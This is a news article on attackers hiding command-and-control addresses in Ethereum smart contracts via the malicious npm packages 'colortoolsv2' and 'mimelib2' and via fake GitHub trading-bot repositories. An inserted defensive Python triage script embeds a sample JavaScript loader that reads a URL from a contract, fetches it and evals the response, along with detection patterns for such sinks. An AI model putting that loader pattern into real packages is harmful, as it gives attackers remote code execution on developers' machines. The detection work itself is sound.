Hackers Hide Malware in Open-Source NPM/GitHub Packages Using Ethereum Smart Contracts

Who would’ve thought digital crooks would use something as techy as Ethereum to hide their dirty work? It sounds like a spy novel, but it’s real. Security experts recently found that cybercriminals are using Ethereum’s smart contracts – those automatic programs on the blockchain – to sneak malware into popular software packages. This clever trick lets attackers avoid getting caught. They spread computer viruses through platforms like npm and GitHub. These are places many developers use to share open-source code. This discovery shows how hackers keep finding new ways to break into software systems.

This new kind of attack is causing a stir. A detailed report from security firm ReversingLabs spilled the beans. They found two nasty packages, “colortoolsv2” and “mimelib2,” which popped up on npm in July. Npm is the biggest registry for JavaScript packages, where programmers grab tools for their apps. On the surface, these packages seemed fine. But they ran a hidden script. This script secretly checked an Ethereum smart contract to get hidden web addresses. These addresses then led to a “command and control” server, which downloaded more malware onto users’ devices.

This method is pretty sneaky. Instead of putting bad links directly into the code, which would be easy to spot, the hackers stashed them on the Ethereum blockchain. This made the bad traffic look like normal crypto activity. Lucija Valentić, a researcher at ReversingLabs, noted, “This is something we hadn’t seen before.” She added that this threat “highlights how fast malicious actors are getting better at hiding their moves in open-source code spots and from developers.” Npm quickly removed the packages after researchers reported them. Still, any developer who downloaded them might have unknowingly infected their projects.
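A defender-side triage check for the pattern described above: an install-time hook in package.json plus a source file that reads a string from a contract, fetches that address and executes what comes back. This is an added example written for this article, not ReversingLabs' tooling or the real packages' code; the manifest, the setup script, the getUrl() contract function, the RPC endpoint and the contract address are all constructed placeholders.

```python
import json
import re

# Constructed sample manifest (not the real colortoolsv2/mimelib2 one); a postinstall hook runs on every npm install.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-color-utils",
    "version": "1.0.0",
    "scripts": {"postinstall": "node setup.js"},
    "dependencies": {"ethers": "^6.0.0"},
})
# Constructed dead-drop sample: read a string from a contract (hypothetical getUrl()), fetch it, execute the result.
SAMPLE_SETUP_JS = """
const { ethers } = require("ethers");
const provider = new ethers.JsonRpcProvider("https://rpc.example.invalid");
const abi = ["function getUrl() view returns (string)"];
const c = new ethers.Contract("0x0000000000000000000000000000000000000000", abi, provider);
c.getUrl().then(u => fetch(u).then(r => r.text()).then(code => eval(code)));
"""

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Heuristic markers; each alone is benign, all three together in one file is what matters.
MARKERS = {
    "chain_read": re.compile(r"ethers\.Contract|JsonRpcProvider|new\s+Web3\b|eth_call"),
    "remote_fetch": re.compile(r"\bfetch\(|https?\.get\(|axios\."),
    "exec_sink": re.compile(r"\beval\(|new\s+Function\(|child_process"),
}

def find_lifecycle_hooks(package_json_text):
    """Return the install-time scripts declared in a package.json."""
    scripts = json.loads(package_json_text).get("scripts", {})
    return {k: v for k, v in scripts.items() if k in LIFECYCLE_HOOKS}

def assess_source(js_text):
    """Return the set of marker names present in one JavaScript source file."""
    return {name for name, rx in MARKERS.items() if rx.search(js_text)}

def triage(package_json_text, sources):
    """Flag the on-chain dead-drop pattern; sources maps file name -> JS text."""
    findings = []
    for name, text in sources.items():
        traits = assess_source(text)
        if traits >= set(MARKERS):
            findings.append((name, "on-chain dead-drop resolver feeding code execution"))
        elif traits:
            findings.append((name, "review: " + ", ".join(sorted(traits))))
    hooks = find_lifecycle_hooks(package_json_text)
    if hooks:
        findings.append(("package.json", "install-time hooks: " + ", ".join(sorted(hooks))))
    return findings
```

Run `triage(SAMPLE_PACKAGE_JSON, {"setup.js": SAMPLE_SETUP_JS})` against an unpacked tarball's files to get one verdict per source file plus a note on any install-time hooks.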

The Bad Guys Are Also Tricking GitHub Users

The trouble isn’t just with npm. The ReversingLabs report found this is part of a bigger scheme. It includes fake repositories on GitHub, which is the largest platform for collaborative open-source code. Many crypto developers use GitHub. For example, fake repos like “solana-trading-bot-v2,” “ethereum-mev-bot-v2,” and “arbitrage-bot” pretended to be crypto trading bots. They aimed to draw in people interested in digital money. These repos looked trustworthy at first glance. They showed thousands of “commits” (code updates), lots of approval stars, and active contributors. But it was all smoke and mirrors.

In truth, the commits were fake and trivial, like just adding or deleting license files over and over. The stars came from fake accounts made in large numbers. The contributors were just “puppet accounts” controlled by the hackers, with names like “pasttimerles,” “slunfuedrac,” and “cnaovalles,” according to the report. This tactic, known as “social engineering,” tricked developers into using these bad packages in their own software. This spread the malware without anyone realizing it. As Valentić explained, “Once we decided to dig deeper into the packages, we found proof of a much larger campaign spreading across both npm and GitHub, trying to lure developers into downloading repositories that included malicious npm packages.”

Crypto Developers Need to Be Careful

This isn’t the first time we’ve seen attacks like this. In past years, hackers used trusted services like GitHub Gists, Google Drive, or OneDrive to hide bad links. But adding Ethereum smart contracts makes detection even harder. The traffic looks normal in places where blockchain is used. Last year, more than 20 similar attacks were found on platforms like npm and PyPI (for Python). Many aimed to steal crypto wallet details or install illegal crypto miners, as CoinDesk reminded everyone.

This means even free and popular online tools can be traps. Developers, especially those in the crypto world, must be careful. Things like the number of stars or commits can easily be faked. Valentić warned, “Developers and organizations need to be alert to efforts to plant malicious code in legitimate applications, access sensitive assets, and steal data or digital assets.” She suggested checking the real history of repositories and using security analysis tools before using any package. This incident really highlights the growing risks in the software supply chain. One infected package can hurt millions of applications. It’s also the latest sign that hackers are quickly learning to use the blockchain world, turning it into a new digital battleground.
